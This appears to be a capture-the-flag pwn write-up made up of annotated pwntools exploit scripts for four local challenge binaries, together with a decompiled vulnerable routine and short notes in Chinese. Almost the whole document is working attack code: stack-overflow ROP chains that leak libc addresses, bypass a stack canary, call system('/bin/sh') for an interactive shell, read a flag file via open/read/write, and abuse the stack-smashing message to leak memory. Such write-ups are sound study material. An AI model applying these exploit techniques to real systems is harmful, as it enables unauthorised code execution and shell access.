babyof
from pwn import*

# Local exploit for ./babyof (x86-64), as written up on this page.
# Preconditions it relies on (all visible from the payload layout): a fixed-size
# stack buffer that the program overruns, a non-PIE binary so the gadget/PLT/GOT
# addresses below are constant, and apparently no stack canary in the vulnerable
# frame (the chain follows the padding directly). PIE, a canary, or a bounded
# read each remove one of those preconditions.
r=process('./babyof')
elf = ELF('./babyof')
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
context(log_level='debug',os='linux',arch='amd64')

# Gadget and return addresses, hard-coded for this binary (not shown on the page).
pop_rdi_ret = 0x0400743
main_addr = 0x040066B
pop_rsi_r15_ret = 0x0400741

# Stage 1: 0x40 bytes of padding plus 8 more (presumably the saved rbp), then a
# chain that calls puts(puts@GOT) to print the runtime address of puts and
# returns into main so the program accepts a second input.
payload = b'a'*0x40 + b'b'*8
payload += p64(pop_rdi_ret)
payload += p64(elf.got['puts'])
payload += p64(elf.plt['puts'])
payload += p64(main_addr)

r.recv()
r.sendline(payload)

# Parse the leak: read up to the 0x7f high byte of a user-space pointer, keep the
# last 6 bytes and zero-extend to 8. libc base and the addresses of system() and
# a "/bin/sh" string are then derived from the local libc's symbol offsets.
leak = u64(r.recvuntil('\x7f')[-6:].ljust(8,b'\x00'))
libc_base = leak - libc.symbols['puts']
sys = libc_base + libc.symbols['system']
binsh = libc_base + next(libc.search(b'/bin/sh\x00'))

# Stage 2: same overflow, rdi = "/bin/sh"; the pop rsi; pop r15 gadget consumes
# two zero qwords (rsi = 0) before the chain returns into system().
payload = b'a'*0x40 + b'b'*8
payload += p64(pop_rdi_ret)
payload += p64(binsh)
payload += p64(pop_rsi_r15_ret)
payload += p64(0)*2
payload += p64(sys)

r.recv()
r.sendline(payload)
r.interactive()
littleof
from pwn import*

# Local exploit for ./littleof (x86-64). Same shape as the babyof script on this
# page, with one extra step: the frame has a stack canary, which the script first
# reads back before placing the ROP chain behind it. The canary read works because
# the program echoes the input buffer back and the echo runs past the 72 bytes
# that were sent (presumably the buffer is not NUL-terminated — confirm in the
# binary). A bounded echo, or NUL-terminating the buffer, closes that leak.
r =process('./littleof')
elf = ELF('./littleof')
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
context(log_level='debug',os='linux',arch='amd64')

# Gadget and return addresses, hard-coded for this binary (not shown on the page).
pop_rdi_ret = 0x0400863
main_addr = 0x0400789
pop_rsi_r15_ret = 0x0400861

# Canary leak: fill exactly up to the canary (0x50-8 = 72 bytes), then take the
# 8 bytes echoed after the 72 'A's. The 0x0a subtracted is the newline appended
# by sendline(), which presumably overwrote the canary's (zero) low byte.
payload = b'A'*(0x50-8)
r.recvuntil("?")
r.sendline(payload)
r.recvuntil("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA")
canary = u64(r.recv(8).ljust(8,b'\x00'))
canary = canary - 0x0a
success(hex(canary))

# Stage 1: padding, the recovered canary, 8 bytes over the saved rbp, then
# puts(puts@GOT) to leak a libc address and a return into main.
payload = b'a'*(0x50-8) + p64(canary) + b'b'*8
payload += p64(pop_rdi_ret)
payload += p64(elf.got['puts'])
payload += p64(elf.plt['puts'])
payload += p64(main_addr)
r.recvuntil("!")
r.sendline(payload)

# Parse the 6 significant bytes of the leaked pointer and derive libc base,
# system() and a "/bin/sh" string from the local libc's symbol offsets.
leak = u64(r.recvuntil('\x7f')[-6:].ljust(8,b'\x00'))
libc_base = leak - libc.symbols['puts']
sys = libc_base + libc.symbols['system']
binsh = libc_base + next(libc.search(b'/bin/sh\x00'))

# The canary is read a second time after returning to main. The guard value is
# fixed for the lifetime of the process, so this repeat is redundant but harmless.
payload = b'A'*(0x50-8)
r.recvuntil("?")
r.sendline(payload)
r.recvuntil("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA")
canary = u64(r.recv(8).ljust(8,b'\x00'))
canary = canary - 0x0a
success(hex(canary))

# Stage 2: same layout, rdi = "/bin/sh", two zero qwords popped into rsi/r15,
# then return into system().
payload = b'a'*(0x50-8) + p64(canary) + b'b'*8
payload += p64(pop_rdi_ret)
payload += p64(binsh)
payload += p64(pop_rsi_r15_ret)
payload += p64(0)*2
payload += p64(sys)
r.recvuntil("!")
r.sendline(payload)
r.interactive()
onecho
小 trick 用 pop 绕过特定位置形参校验
/*
 * Decompiled input routine from ./onecho (IDA-style names kept).
 *
 * Reads a string into a 256-byte stack buffer with scanf and copies it to
 * dest, capped by a2. The scanf format string (unk_804A363) is not visible
 * here; the exploit script on this page sends far more than 256 bytes, which
 * is only consistent with a width-unlimited conversion, i.e. the overflow is
 * in the scanf into s[] and happens before the length check below is reached.
 * A width-limited format (e.g. "%255s") or fgets() would close that.
 */
void *__cdecl sub_80495C6(void *dest, int a2)
{
    char s[256];
    int v4;

    v4 = 0;                          /* dead store, overwritten below (decompiler artifact) */
    __isoc99_scanf(&unk_804A363, s); /* read into fixed 256-byte buffer; format not shown */
    v4 = strlen(s);                  /* a leading NUL makes this 0 regardless of how much was read */
    if ( v4 < a2 )
        return memcpy(dest, s, v4 + 1);  /* copies the terminating NUL as well */
    puts("[?] Error?");
    return memcpy(dest, s, a2 - 1);      /* copies a2-1 bytes; dest is not guaranteed to be NUL-terminated */
}
Open 死活不生效,最后想起来部分情况下需要设置第二个参数 0 ,只读模式打开
from pwn import *

# Local exploit for ./onecho (32-bit). Two ROP chains: the first leaks a libc
# address and stores a file name, the second opens/reads/writes that file.
# Every 0x0804xxxx constant is hard-coded for this binary: the gadgets at
# 0x08049022, 0x08049811 and 0x08049812, the return target 0x0804973F, and the
# writable scratch addresses 0x0804C100 / 0x0804C350 / 0x0804C600. What each
# gadget pops is not shown on this page; the way arguments are laid out suggests
# one-, three- and two-pop gadgets respectively — confirm by disassembly.
r = process("./onecho")
elf = ELF("./onecho")
libc = ELF("/lib/i386-linux-gnu/libc.so.6")

# Stage 1. The leading NUL keeps strlen() of the input at 0 so the length check in
# sub_80495C6 passes; the overflow itself is the unbounded scanf into that function's
# 256-byte stack buffer (0x10c bytes reach the saved ebp, 4 more the return address).
# The first gadget/value pair is presumably the "pop" trick the writeup mentions for
# getting past the argument check — confirm. Then: puts(puts@GOT) -> read(0, 0x0804C350, 0x100) -> 0x0804973F.
payload = b'\x00'+b'a'*(0x10c-1)
payload += b'b'*0x4
payload += p32(0x08049022)+p32(0x0804C100)
payload += p32(elf.plt['puts'])+p32(0x08049022)+p32(elf.got['puts'])
payload += p32(elf.plt['read'])+p32(0x08049811)+p32(0)+p32(0x0804C350)+p32(0x100)
payload += p32(0x0804973F)
r.sendline(payload)
sleep(0.2)
# Supplies the path consumed by the read() in the chain; it is stored at 0x0804C350.
r.send("./flag\x00\x00")

# The 4 bytes after "name:\n" are the leaked puts address; derive libc base from it.
r.recvuntil("name:\n")
leak_addr = u32(r.recv(4))
libc_base = leak_addr - libc.sym['puts']

# Stage 2: open(0x0804C350, 0) — the flags argument must be an explicit 0 (O_RDONLY),
# which the writeup notes was the missing piece — then read(3, 0x0804C600, 0x100) and
# write(1, 0x0804C600, 0x3000), then return to 0x0804973F. fd 3 assumes no other
# descriptor is open in the target; the write length exceeds what was read, so the
# output also contains whatever already sits in that region past the file contents.
payload = b'\x00'+b'b'*(0x10c-1)
payload += b'c'*0x4
payload += p32(0x08049022)+p32(0x0804C600)
payload += p32(0x08049022)+p32(0x0)
payload += p32(libc_base+libc.sym['open'])+p32(0x08049812)+p32(0x0804C350)+p32(0)
payload += p32(elf.plt['read'])+p32(0x08049811)+p32(3)+p32(0x0804C600)+p32(0x100)
payload += p32(elf.plt['write'])+p32(0x08049811)+p32(1)+p32(0x0804C600)+p32(0x3000)
payload += p32(0x0804973F)
r.sendline(payload)
r.interactive()
easyecho
主动触发 canary 保护,打印出 argv[0] 信息,利用栈溢出覆盖 argv[0] 为 flag 地址
from pwn import *
context.log_level='debug'
r=process('./easyecho')

# Local exploit for ./easyecho. Technique, per the writeup: trip the stack canary
# on purpose so glibc's stack-smashing handler aborts and prints argv[0], after
# the argv[0] pointer has been overwritten with the address of the flag buffer.
# Mitigation note: newer glibc releases no longer include argv[0] in the
# "stack smashing detected" message, which removes this information leak.

# Step 1: a 16-byte name is echoed back in "Welcome <name>"; the 6 bytes that follow
# are read as a pointer (presumably because the name is not NUL-terminated). 0xcf0 and
# 0x202040 are offsets specific to this binary: leak-0xcf0 is treated as the program's
# load base and 0x202040 as the offset of the flag buffer — confirm against the binary.
r.recv()
r.sendline('1111111111111111')
r.recvuntil('Welcome 1111111111111111')
leak=u64(r.recv(6).ljust(8,b'\x00'))
flag=leak-0xcf0+0x202040
print(hex(flag))

# Step 2: in the 'backdoor' command, 0x167 bytes of padding, one byte that presumably
# clobbers the canary's low byte (so the check fails), then the flag address in the
# slot that will be reported as argv[0].
print(r.recv())
r.sendline('backdoor')
print(r.recv())
payload=b'a'*(0x167)+b'b'+p64(flag)
r.sendline(payload)
gdb.attach(r)   # debugger hook left in by the author; stalls an unattended run
print(r.recv())
r.sendline("exitexit")   # presumably the command that makes the function return and hit the canary check
r.interactive()
PWNI
2018 国赛原题